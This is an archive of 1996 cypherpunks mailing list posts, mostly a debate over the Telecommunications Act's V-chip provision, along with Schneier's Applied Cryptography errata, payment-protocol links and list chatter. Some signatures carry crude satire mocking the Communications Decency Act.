              nature of upcoming video programming and with the technological
              tools that allow them easily to block violent, sexual, or other
              programming that they believe harmful to their children is a
              nonintrusive and narrowly tailored means of achieving that
              compelling governmental interest.
Charles Donald Smith Jr.

||The government  is my shepherd I need not work. It alloweth me to lie
 down on a good job. It leadeth me beside stilled factories. It destroyeth
 my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
 though I walk through the valley of laziness and deficet spending I shall
 fear no evil, for the government is with me. It prepareth an economic utopia
 for me by appropriating the earnings of my grandchildren. It filleth my head
 with false security. My inefficiency runeth over. Surely, the government 
should care for me all the days of my life, and I will dwell in a fools paradise
forever.................AMEN!   || nuke'm if ya got'em||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 9 Feb 1996 08:17:01 +0800
To: avatar@mindspring.com
Subject: Re: Tell me whats wrong with this
Message-ID: <9602082321.AA11541@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Two things are wrong with the law.

1) Parents still can turn the TV off.  They don't need any V-chip or 
   bills from congress to do that.   (This obvious fact seems
   to escape every bug-eyed person)

2) The v-chip would have already been deployed as an option
   if congress hadn't stepped into the ring.  The marketplace
   saw the demand and had already developed the technology.
   Congress got it's finger in the pie and it will probably be
   2 years now before its actually deployed.  Gee thanks Newt.

Dan

> From owner-cypherpunks@toad.com  Thu Feb  8 17:05:13 1996
> X-Sender: avatar@mindspring.com
> X-Mailer: Windows Eudora Light Version 1.5.2
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Thu, 08 Feb 1996 17:06:22 -0600
> To: tcmay@mail.got.net
> From: avatar@mindspring.com
> Subject: Tell me whats wrong with this
> Cc: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Content-Length: 4330
> 
> Tell me whats wrong with this section of the telecom bill.  I have a six
> year old boy I am trying to raise
> and it is hard enough to teach him respect and values without explaining why
> Ned Beatty is being
> bungholed in the woods by Billy Bob or why the Terminator splattered this
> guys brains all over the
> wall.  
>         Tell me why parents should not be able to censor their OWN
> television so that they may raise their children the way THEY see
> fit...................Did your dad give you his old
> playboys?.........NOOOOO............
> Did he take you down to your grandmothers autopsy before her
> funeral?...................I Don't Think So.....
>         Honestly, don't you believe that what a child is exposed to effects
> his judgement, perception,
>  attitude,and character??
> 
> All I'm saying is it's tough to raise a child these days without the added
> distortion of modern 
> programing and parents need not be denied any tool that can help them
> achieve success.
>          
>  SEC. 551. PARENTAL CHOICE IN TELEVISION PROGRAMMING.
>             (a) FINDINGS- The Congress makes the following findings:
>                 (1) Television influences children's perception of the values
>               and behavior that are common and acceptable in society.
>                 (2) Television station operators, cable television system
>               operators, and video programmers should follow practices in
>               connection with video programming that take into consideration
>               that television broadcast and cable programming has established
>               a uniquely pervasive presence in the lives of American children.
>                 (3) The average American child is exposed to 25 hours of
>               television each week and some children are exposed to as much 
>               as 11 hours of television a day.
>                 (4) Studies have shown that children exposed to violent video
>               programming at a young age have a higher tendency for violent
>               and aggressive behavior later in life than children not so
>               exposed, and that children exposed to violent video programming
>               are prone to assume that acts of violence are acceptable
>               behavior.
>                 (5) Children in the United States are, on average, exposed to
>               an estimated 8,000 murders and 100,000 acts of violence on
>               television by the time the child completes elementary school.
>                 (6) Studies indicate that children are affected by the
>               pervasiveness and casual treatment of sexual material on
>               television, eroding the ability of parents to develop
>               responsible attitudes and behavior in their children.
>                 (7) Parents express grave concern over violent and sexual
>               video programming and strongly support technology that would
>               give them greater control to block video programming in the 
>               home that they consider harmful to their children.
>                 (8) There is a compelling governmental interest in empowering
>               parents to limit the negative influences of video programming
>               that is harmful to children.
>                 (9) Providing parents with timely information about the 
>               nature of upcoming video programming and with the technological
>               tools that allow them easily to block violent, sexual, or other
>               programming that they believe harmful to their children is a
>               nonintrusive and narrowly tailored means of achieving that
>               compelling governmental interest.
> Charles Donald Smith Jr.
> 
> ||The government  is my shepherd I need not work. It alloweth me to lie
>  down on a good job. It leadeth me beside stilled factories. It destroyeth
>  my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
>  though I walk through the valley of laziness and deficet spending I shall
>  fear no evil, for the government is with me. It prepareth an economic utopia
>  for me by appropriating the earnings of my grandchildren. It filleth my head
>  with false security. My inefficiency runeth over. Surely, the government 
> should care for me all the days of my life, and I will dwell in a fools paradise
> forever.................AMEN!   || nuke'm if ya got'em||
> 

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Feb 1996 08:31:52 +0800
To: cypherpunks@toad.com
Subject: Re: Mailing list
Message-ID: <ad3fd0d821021004c9b3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 PM 2/8/96, JOHN MARTIN LEWARS wrote:
>When I wrote:
>>   Please make me apart of your mailing list.
>I meant:
>    Please take me apart on your mailing list.
>Thanks, Jack.

I think Futplex _did_ take you apart on the list.

--Tim


P.S. To have mercy on you, if you want to subscribe to the Cypherpunks
list, send a message to:

majordomo@toad.com

with this in the body:

subscribe cypherpunks







[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 9 Feb 1996 07:58:50 +0800
To: avatar@mindspring.com
Subject: Tell me whats wrong with this
In-Reply-To: <199602082209.RAA17085@borg.mindspring.com>
Message-ID: <9602082334.AA03581@alpha>
MIME-Version: 1.0
Content-Type: text/plain



avatar@mindspring.com writes:
 > I have a six year old boy I am trying to raise and it is hard
 > enough to teach him respect and values...

What does your six-year-old have to do with my TV?

 >         Tell me why parents should not be able to censor their OWN
 > television so that they may raise their children the way THEY see
 > fit

But what about *my* TV?  Why should I be forced to pay for something I
don't want just because you want it for yourself?  [ Why does this
seem so obvious? ]

 > All I'm saying is it's tough to raise a child these days without the added
 > distortion of modern programing ...

"Don't do the crime if you can't do the time."

 > ... and parents need not be denied any tool that can help them
 > achieve success. 

Oh, OK then.  Parents should be given access to incendiary equipment
as a tool to destroy the studios that produce offensive material.

Parents should be given guns and ammunition with which to kill anybody
that gets in the way of their success at raising their children.

Parents should be given unlimited amounts of cash so that they will be
able to achieve success in raising their children.

Give me a break.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Fri, 9 Feb 1996 10:57:06 +0800
To: cypherpunks@toad.com
Subject: Re: Tell me whats wrong with this
Message-ID: <2.2.32.19960209015903.0069ba94@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:49 PM 2/8/96 -0600, Avatar wrote:

>You probably had no problem with seat belts being manditory eqiupment ,
>because they 
>protected YOU and the people YOU cared about. 
>You probably had no problem with manditory airbags, public building smoke
>alarms, unleaded
>fuel, restaurant health codes,etc....Because they protected you and or
>people you care about,
>even though they cost YOU more money.

Gee, there's nothing like false speculations as a basis for attack. I, for
instance, have a friend who's been in two serious car accidents in recent
years. In one she was belted in, and survived a nasty tumble that otherwise
almost certaily would have killed her. In the other, she was in a truck from
the pre-mandated-belts era, and was thrown free before the car collided with
a pole that pierced all the way through the driver's seat. The mandate could
have killed her.

Sure, that's rare. I always belt up, or virtually always. Do I approve the
mandate? No. ditto with all of the others. I want _information_, not
_behavior control_.

So. For those of us who do not generally approve of pushing responsibility
for our morals (or health needs, for those of us with severe immune
problems) onto others, how do you justify compelling us to spend money to
make your life easier?

>It's obvious that you watch a lot television your an excellent sensationalist.
>Besides, we both no that the cost of the chip is insignificant. This device
>hurts no one!

In the first place, we don't know anything of the sort. Show the chip
implemented in a mass-market TV or VCR, and back up your claims. Second, by
putting more rating power into the hands of the State, it does emphatically
threaten freedom of expression. And remember: anyone with your sig file,
assuming you believe its sentiments, has no great ground for confidence that
his views, rather than those of the worst and best-organized busybodies
around, will prevail.

Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 9 Feb 1996 07:35:25 +0800
To: cypherpunks@toad.com
Subject: Re: Nuke em if ya got em "TCMay"
Message-ID: <199602082306.SAA29082@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 05, 1996 06:49:57, 'attila <attila@primenet.com>' wrote: 
 
 
> 
>attila sez: 
> 
>	It is not whether paralax does not know shit from beans, but that 
>he proves to all that he would prefer to censor TCMay and James A. 
>Donald than listen to their opinions, despite the fact he posted his 
>own rather trivial and absurd point.  
> 
>political correctness and the liberal news intrepretations of "all 
>men are created equal" with reverse discrimination, destruction of 
>the work ethic for the dole, and the New World Order whose need is 
>more and more cheaper labor, even to the point of disenfranchising  
>whole element of America society to achieve a worker's underclass is  
>the shit part of beans and shit. 
> 
>	with this, I suppose I have been entered upon your "list" of  
>enemies of the 'statist' nation along with TCMay and James A. Donald, 
>and that my prejudged conviction and sentence requires me to write 
>30,000 lines of debugged C source code before the end of this year.  
> 
>	how about 30,000 lines of debugged Ada source for you?  --while 
>I add you to procmailrc: 
> 
>	    :0: 
>	    * ^[FRST].*paralax 
>	    assholes 
> 
 
It seems that the lib'ers on the list continue to behave in their
increasingly demagogic style. 
 
Instead of dealing with substantive criticism they charge those who
disagree with them are "censors". 
 
First Atilla charges one critic "paralax" with "not wanting to listen" when
it seems obvious that paralax is not only listening but responding. Then
Atilla concludes by giving us the code for his mail software whereby he
will not listen, thus doing the very thing he accuses others of. 
 
Second, instead of discussing the substantive issues he goes off to
denounce the various lib'ber horsemen of the "liberal media," "political
correctness," "reverse discrimination," "the dole," and "the New World
Order." 
 
I sense that both groups of lib'bers share the same methodology. 
 
The first group (Rush's "lib'bers") around people like Dworkin and other
professional "anti-rape feminists" have their Politically Correct Agenda
and Politically Correct terminology. If you disagree with it they proceed
with a stream of demagogic and vitupertive abuse, followed by another
stream of off-the-wall political attacks using words like "stalking,"
"sexual harassment," "rape," and "male patriarchal [whatever]" followed by
statements of their personal sense of "indignation" and "outrage." Then
they announce they are no longer going to listen to the very discussion
they started. 
 
Until they start another. 
 
The second group (the lib'bertarians) have their Politically Correct Agenda
and Politically Correct Language. If you disagree with them to also get a
stream of off-the-wall political attacks featuring terms like those Atilla
used. Then they, very much like the radical feminist lib'bers put their
electronic fingers in their electronic ears so they do not have to listen. 
 
These are the people who have the political agenda, the personal maturity,
and the political strategy to make the net and the world a better place? 
 
Not from what I've seen. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Fri, 9 Feb 1996 11:12:23 +0800
To: cypherpunks@toad.com
Subject: Nando Times and the "decency" act
Message-ID: <v01540b14ad405ee79aa4@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


The NandO Times is an online newspapaer (www.nando.com) that has George
Carlin's seven dirty words and lots more as their lead story today:

see

   http://152.52.2.152/nt/nando.cgi


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Feb 1996 08:36:26 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Tell me whats wrong with this
In-Reply-To: <9602082334.AA03581@alpha>
Message-ID: <199602090021.SAA08312@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> 
> Parents should be given guns and ammunition with which to kill anybody
> that gets in the way of their success at raising their children.
> 
> ______c_____________________________________________________________________
> Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
>        m5@tivoli.com * m101@io.com          * I want more, I want more ...
>       <URL:http://www.io.com/~m101>         *_______________________________
> 

I will go for this one. Especialy since it is alread in the 2nd.

Of course the obvious responce is:

What has my television got to do with your childrearing? Assuming of course
you aren't sitting in my living room watching my tv. In which case don't let
the door hit you where the dog should have bit ya.


                                             Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 9 Feb 1996 11:49:05 +0800
To: cypherpunks@toad.com
Subject: Money & CreditCard URLs
Message-ID: <ad40604c00021004f57b@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Here is a fragment of html that points to several online money or payment
systems.
The first two, SEPP & STT, are the two credit card protocols from the
previously competing camps and out of which the new standard, SET, is
supposed to emerge. STT and SEPP are vague in different ways. Perhaps their
offspring will be more completely specified. They both hide the credit card
number from the merchant. I would be pleased to receive further such URLs.

<H3>Money Protocols</H3>
SEPP;
STT;
NetBill 
Cybercash, and
Ecash.
Mondex
First Virtual,
<a href="http://www.w3.org/pub/Conferences/WWW4/Papers/246/">The Millicent
	Protocol for Inexpensive Electronic Commerce</a>; <A
HREF="http://netmarket.com/nm/pages/account/sid=kcBEtk230F">NetMarket</A>
Mark Twain Bank
<P>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 9 Feb 1996 08:37:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [SILLY] Mailing list
Message-ID: <199602090010.TAA09897@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I knew this was too good to be true:

Forwarded message:
> From owner-cypherpunks@toad.com Thu Feb  8 18:42:54 1996
> Date: Fri, 9 Feb 1996 07:38:08 +0800
> Message-Id: <199602082338.HAA03879@infolink2.infolink.net>
                                     ~~~~~~~~~~~~~~~~~~~~~~

> From: JOHN MARTIN LEWARS <jml216@psu.edu>
> To: cypherpunks@toad.com
> Reply-To: jml216@psu.edu
> Subject: Re: Mailing list
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> When I wrote:
> >   Please make me apart of your mailing list.
> I meant:
>     Please take me apart on your mailing list.
> Thanks, Jack.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Fri, 9 Feb 1996 10:23:58 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: "Plonk"
In-Reply-To: <199602082042.MAA26733@jobe.shell.portal.com>
Message-ID: <199602090131.UAA24706@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Why do people feel the need to announce to the whole world that they have
> just plonked someone?  Big deal.  It happens all the time.  Plonk 'em and get  
> on with your life.

Because Perry has an ego bigger than Bill Clinton, Newt Gingrich, and
Dianne Feinstein all rolled into one, that's why. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring
----------------------------------------------------------------------
According to the Communications Decency Act, these are the words you may
no longer use in your Internet correspondence:  Shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits. The use of shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits, may now earn you a substantial fine
as well as possible jail time, should President Clinton sign this Bill
into law.  Please refrain from using shit, piss, fuck, cunt, cock-sucker,
mother-fucker and tits, to protect your children as well as others, from
their evil influence, thus keeping America "ideologically pure".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 9 Feb 1996 09:21:19 +0800
To: cypherpunks@toad.com
Subject: References for multi-plaintext encryption
Message-ID: <01I0ZDGS414KA0UTTU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"lmccarth@cs.umass.edu"  8-FEB-1996 02:53:06.68

>You said you'd deleted this....

[...]

> http://www.hks.net/cpunks/cpunks-12/1451.html, in particular
> http://www.hks.net/cpunks/cpunks-12/1558.html
---------
	Thank you.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Fri, 9 Feb 1996 10:44:15 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography, 2nd Edition --  Errata version 1.2
Message-ID: <199602090149.TAA00796@parka>
MIME-Version: 1.0
Content-Type: text



                APPLIED CRYPTOGRAPHY, Second Edition

                              ERRATA
                   Version 1.2 - 1 February 1996



This errata includes all errors I have found in the book, including minor
spelling and grammatical errors.  Please distribute this errata sheet to
anyone else who owns a copy of the book.


Page 7:  In line 31, delete the word "source".

Page 10:  The second sentence would be clearer as "Replace the least
significant bit of each byte of the image with the bits of the message."

Page 11:  Line 18, the reference should be "[703]" and not "[699]".

Page 13:  Fifth paragraph, first sentence, should read: "The original
German Enigma had three rotors, chosen from a set of five,...."  This
increased to three rotors chosen from eight during the war, and the Navy
started using four rotors chosen from eight.

Page 14:  The last sentence should read:  "The smallest displacement that
indicates a multiple of the key length is the length of the key."

Page 16:  Third line from the bottom, "1.44" makes more sense as "1.544".

Page 18:  Table 1.1, second item.  1 in 4,000,000 is 2^22.  This makes the
third item equal to 2^55.

Page 53:  Second to last sentence about SKEY should read: "Similarly, the
database is not useful to an attacker."

Page 55:  William Price's first name is Wyn.

Page 60:  In Step (4) of the Kerberos protocol, change "Bob sends" to "Bob
creates".

Page 61:  Step (3), the second message should contain A instead of B.

Page 62:  In the third line, there's a comma missing.

Page 63:  Second protocol, step (2), the second message should be
"S_T(C,K_C)".

Page 70:  In the first step (4), the equation should be "R XOR S = M".  In
the second step (2), it should be "to generate U".

Page 77:  In step (2), the message is signed with Trent's private key.  And
T_n is mistakenly both the time and the timestamp.

Page 80:  In line 7, "step (3)" should be "step (5)".

Page 82:  Fourth line from the bottom, the correct expression is "up and
died."

Page 99:  Tenth line from the bottom, delete the second word: "will".

Page 104:  Graph isomorphism has never been proven to be an NP-Complete
problem.  It does seem to be hard, and is probably useful for cryptography.

Page 105:  In Step (2), Peggy gives Victor a copy of H'.

Page 106:  In the first line, "step (3)" should be "step (4)".

Page 112:  Step (1) should read "Alice takes the document and multiplies it
by a random value."

Page 116:  The protocol could be worded better.  Step (3) should begin:
"Alice decrypts Bob's key twice, once with each of her private keys."  Step
(4) should begin: "Alice encrypts both of her messages, each with a
different one of the DES keys...."

Page 126:  The "Voting with Blind Signatures" protocol is a little more
complicated.  The voter does not send all the blinding factors in step (2). 
The CTF requests 9 of 10 blinding factors in step (3), and the voter sends
only those blinding factors to the CTF.  Additionally, in step three only
the one messages (containing a set of 
votes) that has not been unblinded will effectively be signed by the CTF.

Page 134:  Another problem with this protocol is that there are numerous
ways that various participants can cheat and collude to find out the salary
of another participant.  These cheaters can misrepresent their own salaries
during their attack.

Page 135:  Lines 13-14; technically Alice and Bob get no additional
information about the other's numbers.

Page 136:  Lines 14-15; technically Alice and Bob get no additional
information about the other's numbers.

Page 144:  Line 27, the odds should be "1 in n".  Line 29, "step (2) should
be "step (1)".

Page 146:  Fourth line from the bottom, delete the word "that".

Page 161:  In the eleventh line from the bottom, "harnesses" should be
"harnessed".

Page 175:  Line 8, it's really triple-DES encryption.

Page 181:  Line 8 should read "he does not know it" instead of "he does
know it".

Page 195:  In line 13, the reference number should be [402].

Page 201:  Error Propagation, lines 5-6.  The sentence should read: "In 8-
bit CFB mode, 9 bytes of decrypted plaintext are garbled by a single-bit
error in the ciphertext."

Page 202:  Third to last line, toggling individual bits does not affect
subsequent bits in a synchronous stream cipher.

Page 203:  Section 9.8, both equations should be "S_i = E_K(S_(i-1))".

Page 209:  Table 9.1.   CFB, Security: Bits of the last block can be
changed, not the first.  CFB, Efficiency: The speed is the same as the
block cipher only in 64-bit CFB.  CFB and OFB, Efficiency: "Ciphertext is
the same size as the plaintext" should be a plus.

Page 213:  In the last line of the third paragraph, "cryptanalyze" is
misspelled.

Page 217:  The Table 10.1 headers got garbled.  They should be:
"Algorithm", "Confidentiality", "Authentication", "Integrity", and "Key
Management".

Page 246:  The last line should be: "#define isEven(x) ((x & 0x01) == 0)".

Page 249:  Line 9, "Euclid's generalization" should be "Euler's
generalization".

Page 251:  Lines 20-21.  The sentence should read: "For example, there are
11 quadratic residues mod 35: 1, 4, 9, 11, 14, 15, 16, 21, 25, 29, and 30." 
See page 505 for more details.

Page 258:  In line 27, his name is spelled "Chandrasekhar".

Page 259:  Lehmann reference "[903]" should be [945]".

Page 275:  Figure 12.4; "46-Bit Input" should be "48-Bit Input".

Page 287:  In line 13, "first and third" should be "second and third".

Page 287:  In Figure 12.6, there should be no period in X or Y.

Page 288:  In figure 12.7, the final output on the right side should be
DELTA=0.

Page 292:  Second line, "b_24" should be "b_26".  In line 10, "1/2 - .0061"
should be "1/2 + .0061".

Page 295:  Fourth line from the bottom, 2^(120/n) should be (2^120)/n.

Page 300:  In the first line, "56" should be "48".

Page 306:  The first sentence is wrong.  The key is rotated to the right;
the key and data move in opposite directions to minimize redundant key bit
operations.  Also, the XOR happens after the rotation.  The third paragraph
should be modified to be the opposite of this.  In any case, Madryga is
vulnerable to differential cryptanalysis with about 5000 chosen plaintexts. 
Don't use it.

Page 307:  Last line, "complementation" is misspelled as "complemention".

Page 311:  Second paragraph, second line should be: "it more quickly than
by brute force..."

Page 316:  In Table 13.2, P_2 should be "379", not "279".

Page 319:  In line 11, Section "25.13" should be "25.14".

Page 322:  Last line, the chip is 107.8 square mm.

Page 325:  Last line, "mod 3" should be "mod 4".

Page 338:  In Figure 14.3 and in the first line, "f" should be "F".

Page 340:  Second equation should be "mod 256".

Page 341:  The current variants of SAFER are SAFER SK-40, SAFER SK-64, and
SAFER SK-128, all with a modified key schedule, in response to a
theoretical attack by Lars Knudsen presented at Crypto '95.

Page 342:  In the description of 3-Way, "K^(n+1)" should be "K_n".

Page 345:  Lines 10 and 11; the + should be a -.

Page 346:  The reference number for BaseKing should be [402].

Page 352:  In line 8, that second "l" should be an "r".

Page 358:  In the decryption equation of Davies-Price mode, the final D
should be an E.

Page 362:  In the first equation, P is used to indicate both padding and
plaintext.  If P is plaintext and p is padding, then the equation should
be: C = E_K3(p(E_K2(p(E_K1(P))))).

Page 362:  Figure 15.2 is wrong.  The middle and top rows of "Encrypt," and
the plaintext feeding them, are shifted right by 1/2 block from where they
should be.

Page 363:  The parenthetical remark would be clearer as: "encryption with
one of n different keys, used cyclically".

Page 363:  Second to last line, the equation should have an I_2 in place of
the I_1.

Page 367:  Second equation, "P XOR K_3" should be "C XOR K_3".

Page 369:  A maximal period linear congruential generator as a period of m,
not m-1.

Page 375:  Third paragraph should read:  "It is easy to turn this into a
maximal period LFSR.  The highest exponent is the size of the register, n. 
Number the bits from n-1 to 0.  The exponents, including the 0, specify the
tap sequence, counting from the right of the register.  The x^n term of the
polynomial stands for the input being fed into the left end."  The next
paragraph is wrong, as is the code and the figure.

Page 379:  Second line of code has an extra close parentheses.

Page 380:  The fourth line should begin: "On the other hand, an
astonishingly...."

Page 382:  In paragraph 4, "LFSR" would be more clear if it were labeled
"LFSR-2".  Similarly, in the first sentence of paragraph 5  "LFSR" would be
more clear if it were labeled "LFSR-3".

Page 384:  Bilateral Stop-and-Go Generator:  To agree with Figure 16.11,
reverse "LFSR-1" and "LFSR-2".

Page 389:  Some more details on the GSM algorithms.  A3 is the
authentication algorithm in the smart card.  A8 is just a bit shuffling
process that takes part of the output of A3 and turns it into a session key
for A5.  A5 is the privacy algorithm.  There are two algorithms used in
GSM: A5/1 and A5/2.  A5/1 can be used by only certain countries; A5/2 can
be used by all countries.

Page 391:  In the 11th line under Fish, it should be "D_j" instead of
"D_i".

Page 393:  In Figure 16.17, there should be an arrow from the fourth byte
to the Output Function.

Page 393:  Second sentence should be: "It's a method for combining multiple
pseudo-random streams that increases their security."

Page 398:  In the third line of the section on SEAL, "kilobytes" is
misspelled as "kiloytes".

Page 411:  Another option for an alternating stop-and-go generator would be
to use a LFSR in Register-2, a FCSR in Register-3, and either in Register-
1.  This may have advantages over either of the three constructions listed.

Page 420:  Table 17.3, the speed should be in kilobytes/second.

Page 429:  The second sentence should be: "It returns a fixed-length hash
value, h."

Page 431:  In step (2), "prepend" instead of "append".

Page 440: In item 3, there is an "AND" missing in the equation.

Page 441:  The compression function of MD2 is confusing without the
indentations.  The two for-loops are nested; the inner loop includes the
next two statements; and the other loop the statement after that.

Page 443:  Last paragraph, the operation number runs from 0 to 79.

Page 444:  In figure 18.7, the a, b, c, d, and e variables are backwards.

Page 445:  Line 14, SHA should be compared to MD4.

Page 447:  Lines 3-4 should read: "...CFB in [1145], CBC in [55,56,54]...."

Page 449:  Figure 18.9, M_i and H_i-1 in the upper-left diagram should be
reversed.

Page 454:  Seventh and sixth lines from the bottom, Z is the sum of the
message blocks as if they were 256-bit integers.

Page 456:  Table 18.2.  It's "Hash Speeds", not "Encryption Speeds", and it
is measured in "kilobytes/second".  "SNEERU" should be "SNEFRU".

Page 465:  In the third line of text, the number should be n^-1.

Page 469:  Table 19.3, the "Clock Cycles" entry for the Siemens chip should
be ".3M".

Page 470:  Sixth line from the bottom, the n' should be an m'.

Page 470:  The second to last line is missing an "is".

Page 471:  In the sixth line from the bottom, "n'^d mod n" should be "m'^d
mod n"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Sun, 11 Feb 1996 01:30:21 +0800
To: m5@dev.tivoli.com
Subject: Re: Tell me whats wrong with this
Message-ID: <199602090054.TAA03816@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:34 PM 2/8/96 -0600, you wrote:
>
>avatar@mindspring.com writes:
> > I have a six year old boy I am trying to raise and it is hard
> > enough to teach him respect and values...
>
>What does your six-year-old have to do with my TV?
>
> >         Tell me why parents should not be able to censor their OWN
> > television so that they may raise their children the way THEY see
> > fit
>
>But what about *my* TV?  Why should I be forced to pay for something I
>don't want just because you want it for yourself?  [ Why does this
>seem so obvious? 

You probably had no problem with seat belts being manditory eqiupment ,
because they 
protected YOU and the people YOU cared about. 
You probably had no problem with manditory airbags, public building smoke
alarms, unleaded
fuel, restaurant health codes,etc....Because they protected you and or
people you care about,
even though they cost YOU more money.
>
> > All I'm saying is it's tough to raise a child these days without the added
> > distortion of modern programing ...
>
>"Don't do the crime if you can't do the time."
>
> > ... and parents need not be denied any tool that can help them
> > achieve success. 
>
>Oh, OK then.  Parents should be given access to incendiary equipment
>as a tool to destroy the studios that produce offensive material.
>
It's obvious that you watch a lot television your an excellent sensationalist.
Besides, we both no that the cost of the chip is insignificant. This device
hurts no one!
Charles Donald Smith Jr.

||The government  is my shepherd I need not work. It alloweth me to lie
 down on a good job. It leadeth me beside stilled factories. It destroyeth
 my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
 though I walk through the valley of laziness and deficet spending I shall
 fear no evil, for the government is with me. It prepareth an economic utopia
 for me by appropriating the earnings of my grandchildren. It filleth my head
 with false security. My inefficiency runeth over. Surely, the government 
should care for me all the days of my life, and I will dwell in a fools paradise
forever.................AMEN!   || nuke'm if ya got'em||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Feb 1996 11:37:12 +0800
To: Bruce Schneier <cypherpunks@toad.com
Subject: Re: Applied Cryptography, 2nd Edition --  Errata version 1.2
Message-ID: <ad3ff1892602100477db@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:49 AM 2/9/96, Bruce Schneier wrote:
>                APPLIED CRYPTOGRAPHY, Second Edition
>
>                              ERRATA
>                   Version 1.2 - 1 February 1996
>
...

Wow. Does this mean the Third Edition will be coming out soon?

(Not to sound harsh, but that's a *lot* of errors still in the book...I
thought a lot of reviewers were going to squish out these sorts of things?)

--Tim


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard J. Coleman" <coleman@math.gatech.edu>
Date: Fri, 9 Feb 1996 09:48:13 +0800
To: cypherpunks@toad.com
